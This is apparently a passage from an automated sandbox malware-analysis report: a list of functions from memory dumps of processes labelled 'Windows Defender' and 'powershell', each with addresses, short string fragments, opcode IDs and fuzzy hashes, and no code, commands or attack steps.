                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$6g$6g$6g$"rg$0Dq$8Mq$U
                                                    • API String ID: 0-574773328
                                                    • Opcode ID: 828b4d94883194d0214196a4d38502ea297844e48d3d397371633c8c944edbb8
                                                    • Instruction ID: 7953e7e5218b7f82e97a9984400201e3624a242e33474a918d1d43b41043a79f
                                                    • Opcode Fuzzy Hash: 828b4d94883194d0214196a4d38502ea297844e48d3d397371633c8c944edbb8
                                                    • Instruction Fuzzy Hash: A122C761A19A499FE798FB3CC45977977E2FF9A344F40457DE00EC36E2DE28A8018781
                                                    Function 00007FFAAB7A20C1 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A$r6g
                                                    • API String ID: 0-4080485727
                                                    • Opcode ID: 75ad02fd3d805cf0f5fea6dea541f2d7d2f9dfc8f9b4a41a0599d5b9b660837c
                                                    • Instruction ID: 006b983b9eed684422835a27539a10ec11b7f0bedd97fd6fee11e0ab261a1545
                                                    • Opcode Fuzzy Hash: 75ad02fd3d805cf0f5fea6dea541f2d7d2f9dfc8f9b4a41a0599d5b9b660837c
                                                    • Instruction Fuzzy Hash: 45510451A1E6C58FD796AB7898646B67FE5EF87215B0804FFE0CDC71A3DD580806C382
                                                    Function 00007FFAAB7A0E5E Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A
                                                    • API String ID: 0-3554254475
                                                    • Opcode ID: b4fcb5c586c324112745db98b934118b0b814142bc9141fa9e2cce4948764088
                                                    • Instruction ID: 9e0f2bb5699bdef23cca8d93f7ac62e816e8d41e9e617f9f068ad9c6be277c8f
                                                    • Opcode Fuzzy Hash: b4fcb5c586c324112745db98b934118b0b814142bc9141fa9e2cce4948764088
                                                    • Instruction Fuzzy Hash: 0A715B53A0D6965EE366B73CE8199F92B95DF87230B0981FBD0CDCB5A3DC0C28468391
                                                    Function 00007FFAAB7A0AFA Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: c355a2f31b664b552fc93763655452b0e757762beb4b3e409db7383a98f2b671
                                                    • Instruction ID: 3145b52378584f83a8e6a2808576bb7ae257cd41afede6bd2e654d9a6420d41f
                                                    • Opcode Fuzzy Hash: c355a2f31b664b552fc93763655452b0e757762beb4b3e409db7383a98f2b671
                                                    • Instruction Fuzzy Hash: 0251D173A0A51ADFDB54BB78E8459FC73B1EF85325F048ABAD009C7292CD2974458790
                                                    Function 00007FFAAB7A0B6F Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: 81c40be2c27a5f55bc19323c8538d8fb36f80304f223d9aeb64491015b80fd91
                                                    • Instruction ID: 945675679fe12d23267f7dce02058c4ac20545f31847d75a2e4b4801571b9911
                                                    • Opcode Fuzzy Hash: 81c40be2c27a5f55bc19323c8538d8fb36f80304f223d9aeb64491015b80fd91
                                                    • Instruction Fuzzy Hash: 9741FF72B0991E9FDB44FB78C855AFD73A1FF89311F4086BAD009C7292CE38A4468790
                                                    Function 00007FFAAB7A07F2 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ;M_$<M_^
                                                    • API String ID: 0-3421805066
                                                    • Opcode ID: 7a26e0a136d3e70ec40becb35989c247c3c2b7957858715232b8797e9876b8f7
                                                    • Instruction ID: 11c9a459f2091dbbbc3286d553445ba51623ab62258ee6770d077ce1a49b6994
                                                    • Opcode Fuzzy Hash: 7a26e0a136d3e70ec40becb35989c247c3c2b7957858715232b8797e9876b8f7
                                                    • Instruction Fuzzy Hash: 73412672A0A689DFD394F778C8995E87BA1EF86254B4088F9E00DC7397CD2C68058791
                                                    Function 00007FFAAB7A11F2 Relevance: 1.8, Strings: 1, Instructions: 579COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2M_^
                                                    • API String ID: 0-3000290509
                                                    • Opcode ID: 78d56ff434ccce1ab10dcbc43fbe4ec6f531a5a9fb309cc8f40ac75c6ab688c6
                                                    • Instruction ID: f2975404c99de11ba89f644b18012e030154206ed98c256992de9c91ecaebb55
                                                    • Opcode Fuzzy Hash: 78d56ff434ccce1ab10dcbc43fbe4ec6f531a5a9fb309cc8f40ac75c6ab688c6
                                                    • Instruction Fuzzy Hash: CE513563E0A69A9FE751A77CE8650FD7F70EF43260B0946FBD08DDA4A3DC1824098390
                                                    Function 00007FFAAB7A11F0 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2M_^
                                                    • API String ID: 0-3000290509
                                                    • Opcode ID: 081c2ec471088bd53270fb269e504d0ee6caa13f49057326ec29f15341fd1e8a
                                                    • Instruction ID: fcc475a77602351b880910f89ca1a651c61fba0b38b9378dcb51525b5d1c8b29
                                                    • Opcode Fuzzy Hash: 081c2ec471088bd53270fb269e504d0ee6caa13f49057326ec29f15341fd1e8a
                                                    • Instruction Fuzzy Hash: BC513763D0A69A9FE751A77CE8655FD7F70EF43260B0986FBD08DDA4A3DC1824098390
                                                    Function 00007FFAAB7A0638 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6g
                                                    • API String ID: 0-2482269165
                                                    • Opcode ID: 4ab4ca9560f3af9ed5901cd884ba6156ff23b8fb71a02c65d04ed557654e8105
                                                    • Instruction ID: 75e2040451fe05df04415c529db549a8d16e6b13ac0f17ee02f429c97cbf7a08
                                                    • Opcode Fuzzy Hash: 4ab4ca9560f3af9ed5901cd884ba6156ff23b8fb71a02c65d04ed557654e8105
                                                    • Instruction Fuzzy Hash: B331E661B1C9094FE698EB2CD469679B6D6FF99310F0405BEE00EC33A3DD689C018381
                                                    Function 00007FFAAB7A2291 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8eq
                                                    • API String ID: 0-356513418
                                                    • Opcode ID: a9c8da9d87d5e12dbc5798a50dadf1ae8adeb142a29d135d54f1dbe88db460fa
                                                    • Instruction ID: a93f6c0b3f60f1ae6acc396b466dcc532bea1f86fe5bc1aff73f5b663d98e542
                                                    • Opcode Fuzzy Hash: a9c8da9d87d5e12dbc5798a50dadf1ae8adeb142a29d135d54f1dbe88db460fa
                                                    • Instruction Fuzzy Hash: 5F01DF1590FA818FE795A32848655757FF1CB972A1B0944BEE88CC61F7D8886E4883D2
                                                    Function 00007FFAAB7A12B8 Relevance: .5, Instructions: 485COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d73d8ba4037e0e0499ed548b8ede3cc0cc29047c128f2903e58c850c367e1bb
                                                    • Instruction ID: 49a3135ecc17fc71880c9d3aac8bbab5ab40fb44872b9ebe1e695511b23d6435
                                                    • Opcode Fuzzy Hash: 4d73d8ba4037e0e0499ed548b8ede3cc0cc29047c128f2903e58c850c367e1bb
                                                    • Instruction Fuzzy Hash: 7A31E462D0AA8E8FE791D768C8651FCBBB1EF47240F4546FBD00EE71E6CD6428058791
                                                    Function 00007FFAAB7A0D48 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
                                                    • Instruction ID: 066d5cf18f932706d4f24142d9ebb86ba15a3628c1a94be8c741039da6bc7d4e
                                                    • Opcode Fuzzy Hash: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
                                                    • Instruction Fuzzy Hash: 28218152B1590A8FFB94BBBCD80A7FC72D6EF98751F10457AE00DC3292DD28A8014381
                                                    Function 00007FFAAB7A086D Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.1713082940.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 06c52c7c8a0273d289e947d6ba1fea412cbbce019cd807ea1c914c61c263f7de
                                                    • Instruction ID: aac3e0d447776063c6a4cd1d9dcc2f83a801f3cf63f4d1925460bacb925192ff
                                                    • Opcode Fuzzy Hash: 06c52c7c8a0273d289e947d6ba1fea412cbbce019cd807ea1c914c61c263f7de
                                                    • Instruction Fuzzy Hash: F421E731A1594D9FC798FB28C494AAC7B72FF8A244F8188E8E409D779ACE3C7900C751

                                                    Executed Functions

                                                    Function 00007FFAAB78644D Relevance: 2.0, Strings: 1, Instructions: 717COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2239324819.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab780000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g
                                                    • API String ID: 0-1031791518
                                                    • Opcode ID: 509f3ca8a304351c8bc9d5f7be6a2613b6b3d3bcec782d459bc78fccb6c041c4
                                                    • Instruction ID: fe1057bce9ff678edab700836a36551f0342483b10f0a5ac309d0ead45219d0e
                                                    • Opcode Fuzzy Hash: 509f3ca8a304351c8bc9d5f7be6a2613b6b3d3bcec782d459bc78fccb6c041c4
                                                    • Instruction Fuzzy Hash: B6D18C30A09A4D8FDB94DF98C454EA97BF1FF69340F1481AAD40DD72A6CA74E885CBC1
                                                    Function 00007FFAAB66ED40 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2236706395.00007FFAAB66D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB66D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab66d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: {Q13
                                                    • API String ID: 0-2307512994
                                                    • Opcode ID: 90a679d9310e5a3b1fde9d897b63a24a59a6a9f41618b2facbb090edc55ddd61
                                                    • Instruction ID: 84675dcf944f5bd53608784e21346db6d377f9e30b921f4f1c1ddba1aa3d49fe
                                                    • Opcode Fuzzy Hash: 90a679d9310e5a3b1fde9d897b63a24a59a6a9f41618b2facbb090edc55ddd61
                                                    • Instruction Fuzzy Hash: 8341167040EBC48FE75A9B2898519523FF0EF53260F1901DFE08CCB1A3D629AC4AC792
                                                    Function 00007FFAAB856631 Relevance: .4, Instructions: 423COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2241988460.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab850000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1f5348f876e2bd66fcb44b797534b6e758eb26c286dbfa2ab897bf66a3e678a8
                                                    • Instruction ID: 4e5f84482c19ceaa78bf3b5edd55badd5702a0bb135ed8ca64074e454be55717
                                                    • Opcode Fuzzy Hash: 1f5348f876e2bd66fcb44b797534b6e758eb26c286dbfa2ab897bf66a3e678a8
                                                    • Instruction Fuzzy Hash: D5C1467291EB8A9FE765DB6C88155B9BBD1EF1B350B0842FED44DC70A3D918A809C3C1
                                                    Function 00007FFAAB78A7EC Relevance: .2, Instructions: 234COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2239324819.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab780000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e0cf5e1273619055afea36072589b29237baf895d54638a6303862a21b35d10
                                                    • Instruction ID: 0c45a20c57673b047bd43903a6e4208580b448718dbd639da707b3541246729b
                                                    • Opcode Fuzzy Hash: 5e0cf5e1273619055afea36072589b29237baf895d54638a6303862a21b35d10
                                                    • Instruction Fuzzy Hash: 2F61F57150EBC58FD34ACB68C8A54B07BE0EF5725870841BED489CB173ED59A84BC792
                                                    Function 00007FFAAB789F95 Relevance: .2, Instructions: 202COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2239324819.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab780000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab9d8f5122d7897affb6ba1b5270e4391fd484b1a049afd001afaec54cd10f23
                                                    • Instruction ID: e0443d2f437607c42dcc80d77a12fca27d2191ec1ec765d86f58657a28486f7b
                                                    • Opcode Fuzzy Hash: ab9d8f5122d7897affb6ba1b5270e4391fd484b1a049afd001afaec54cd10f23
                                                    • Instruction Fuzzy Hash: F851FAA390AAD69BE31697ECDCA61F93F60DF12269B0C41F2D1CC8A073FD55245A43C2
                                                    Function 00007FFAAB789748 Relevance: .1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2239324819.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab780000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a51f5435e1dbd65f71523ef98f7bedf5a2f3083dd99b57159cbda4ad9605b575
                                                    • Instruction ID: 6660ba6ffd61ce1324d2edd8ec2f66ada2cadb187c8bc6811b3c72eefd832240
                                                    • Opcode Fuzzy Hash: a51f5435e1dbd65f71523ef98f7bedf5a2f3083dd99b57159cbda4ad9605b575
                                                    • Instruction Fuzzy Hash: 23410D7190DF889FEB189F5C98466F8BBE0FB95311F04416FE049D3252DA70A855C7C2
                                                    Function 00007FFAAB78A47C Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2239324819.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab780000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e1f76f90937afe5539f306091e384a0053c18622359e3bbcbad31d295be4708e
                                                    • Instruction ID: a4649b037da257fe730b1a60872816a6dc4bdc6804dd104af217878ff12e068e
                                                    • Opcode Fuzzy Hash: e1f76f90937afe5539f306091e384a0053c18622359e3bbcbad31d295be4708e
                                                    • Instruction Fuzzy Hash: 8E214B3090C7888FDB59DBAC984A7F57FE0EB96331F04425BD04DC3162D6749456CB92
                                                    Function 00007FFAAB7833B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2239324819.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab780000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction ID: 5994b4c6afc76eaa68cc20c08cfcb40c45483ef0770f6259050959ab7a6911e9
                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                    • Instruction Fuzzy Hash: 1201677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                    Function 00007FFAAB85414D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2241988460.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab850000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0219d82834f53458f2a06623c650dba638d059fe60d1e5cafe9000614af294ac
                                                    • Instruction ID: 5bf448f8517ce6a29f4ee4d1d96bbb0c5441038540c79605de40f5abd12a0d70
                                                    • Opcode Fuzzy Hash: 0219d82834f53458f2a06623c650dba638d059fe60d1e5cafe9000614af294ac
                                                    • Instruction Fuzzy Hash: 14F09A32A8D5448FD768EB5CE4428E873E0EF5A360B1540BAE05DC71B7CA25EC44C780
                                                    Function 00007FFAAB854400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2241988460.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab850000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ed512953e68d6c77d0527f844ea7ad8077d9b0959d5f47ea8d90f81737871a8
                                                    • Instruction ID: 76f375a4ce846cee790f502ccc83bf78916aa7fe4720d5d8a0acb864f006c678
                                                    • Opcode Fuzzy Hash: 3ed512953e68d6c77d0527f844ea7ad8077d9b0959d5f47ea8d90f81737871a8
                                                    • Instruction Fuzzy Hash: 6AF0BE32A8E5448FD758EB1CE0518A877E0FF0A36070540FAE04DCB0B3CA25BC44C780
                                                    Function 00007FFAAB8541D1 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2241988460.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab850000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: 1471bd97070389909b4e09f91081169eb79bfead67447fda4b9e8c8c08b8971a
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: ACE0E531B8C808CF9A68DB0CE0419A973E1EB99361B5542AAD14EC7565CA22FC558B80

                                                    Non-executed Functions

                                                    Function 00007FFAAB788B69 Relevance: 6.4, Strings: 5, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2239324819.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffaab780000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N_^7$N_^8$N_^?$N_^@$N_^F
                                                    • API String ID: 0-358538561
                                                    • Opcode ID: 7289889e85b9c2f2e34ac98c3dad5a72bcc0ad2526768ddf8618a0cee5c3eeb3
                                                    • Instruction ID: e1e79fbe169b58bc0f06fb5e66e02e0f02c041f334755d952cc5a88c4444faca
                                                    • Opcode Fuzzy Hash: 7289889e85b9c2f2e34ac98c3dad5a72bcc0ad2526768ddf8618a0cee5c3eeb3
                                                    • Instruction Fuzzy Hash: 854125A3B08432AA93153BBCFC24AED7B54DF9427974689F6D28DCE443EC14708B86C5

                                                    Executed Functions

                                                    Function 00007FFAAB7A644D Relevance: 2.0, Strings: 1, Instructions: 718COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2360933341.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab7a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g
                                                    • API String ID: 0-1031791518
                                                    • Opcode ID: 9436ba0c525c73f5b47716196d181b5b2424c977f7599b50211a05ead014d642
                                                    • Instruction ID: 71994d2990b5477bb173ce36d581901c5b8ade96e023c4e98d3089d245882000
                                                    • Opcode Fuzzy Hash: 9436ba0c525c73f5b47716196d181b5b2424c977f7599b50211a05ead014d642
                                                    • Instruction Fuzzy Hash: 4DD19C30A19A4D8FDB98DF58C444EA9BBF1FF69340F14816AD40DD72A6CA74E885CBC1
                                                    Function 00007FFAAB876605 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2364138689.00007FFAAB870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab870000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: X7HG
                                                    • API String ID: 0-3737197178
                                                    • Opcode ID: b895248d22c44849cd4493373853e2f61651e140010ff6f4f0b0ea1fe3973444
                                                    • Instruction ID: c9b89cced0c387183faf1ad5bf84ee1a5a3304632f81516dab82e9f2823efc93
                                                    • Opcode Fuzzy Hash: b895248d22c44849cd4493373853e2f61651e140010ff6f4f0b0ea1fe3973444
                                                    • Instruction Fuzzy Hash: 8AD14862D0EBCA9FE765DB6C88155B97F91EF0B398B0841FED44DC70A3D918AC498381
                                                    Function 00007FFAAB7A9760 Relevance: .1, Instructions: 142COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2360933341.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab7a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2239df452a9a227df12a0c0689752c9b971e5f915c1dde9a29affd8cae4b155
                                                    • Instruction ID: 46b17870ebdfbb321eb06ed381e82dbbfeb35eb1b29ccb1a62881627aac1e7a2
                                                    • Opcode Fuzzy Hash: e2239df452a9a227df12a0c0689752c9b971e5f915c1dde9a29affd8cae4b155
                                                    • Instruction Fuzzy Hash: 6F41087190DB888FE7599B5C9C065A97FF0FB96310F04816FE089932A2CA64B815CBC2
                                                    Function 00007FFAAB68EE20 Relevance: .1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2357900240.00007FFAAB68D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB68D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab68d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e3b77b087fcb889414c2c3545e9b999016f23cfa514de4e434048b761eb7de2f
                                                    • Instruction ID: 0f5b7d8e4890eed557405b033839df02d2b00a8c306ec005db26a13df3612a28
                                                    • Opcode Fuzzy Hash: e3b77b087fcb889414c2c3545e9b999016f23cfa514de4e434048b761eb7de2f
                                                    • Instruction Fuzzy Hash: B241267140EBC48FD7569B2898459623FF0EF53360B1505EFD088CB1A3D725A84AC7D2
                                                    Function 00007FFAAB7AA49C Relevance: .1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2360933341.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaab7a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e73cdff63e11f4cb175c5b02ca7e5c03248541929edb0efa32653a64299481b
                                                    • Instruction ID: 292cb3237f11793ac618a13767a504c49e8bc91f1989595fbc20a6719f7d8480
                                                    • Opcode Fuzzy Hash: 5e73cdff63e11f4cb175c5b02ca7e5c03248541929edb0efa32653a64299481b
                                                    • Instruction Fuzzy Hash: 1E21093190C74C8FDB59DBAC984A6E97BF0EB56321F04826FD049C3162D674A41ACB92
